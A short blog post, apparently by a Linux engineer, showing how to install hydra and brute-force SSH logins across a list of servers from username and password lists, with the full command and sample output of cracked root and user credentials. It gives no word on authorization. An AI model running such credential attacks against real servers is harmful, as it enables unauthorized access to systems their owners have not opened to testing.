How to use hydra to test/crack ssh credentials for a list of servers

To install hydra on Ubuntu:

sudo apt install hydra

Simply, to start our test/attack, we have a list of usernames, list of passwords and list of servers:

hydra -L users.txt -P passes.txt -u -M hosts.txt ssh -o Report.txt


users.txt is the file containing the user names, one per line, e.g.


passes.txt is the list of passwords, one per line as well, e.g.


hosts.txt is the list of IPs to test/attack, one per line, e.g.

Report.txt is the file containing the list of servers that could be cracked using values of users/passes/hosts from the files we provided, e.g.

[22][ssh] host:   login: root   password: expectedpass1
[22][ssh] host: login: user1 password: expectedpass2
[22][ssh] host: login: user2 password: expectedpass3

That’s it, Enjoy!

Sources: Mainly the hydra man page and some online forums

About SoCRaT

Systems Engineer, OSS & Linux Geek
This entry was posted in Linux and tagged , , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s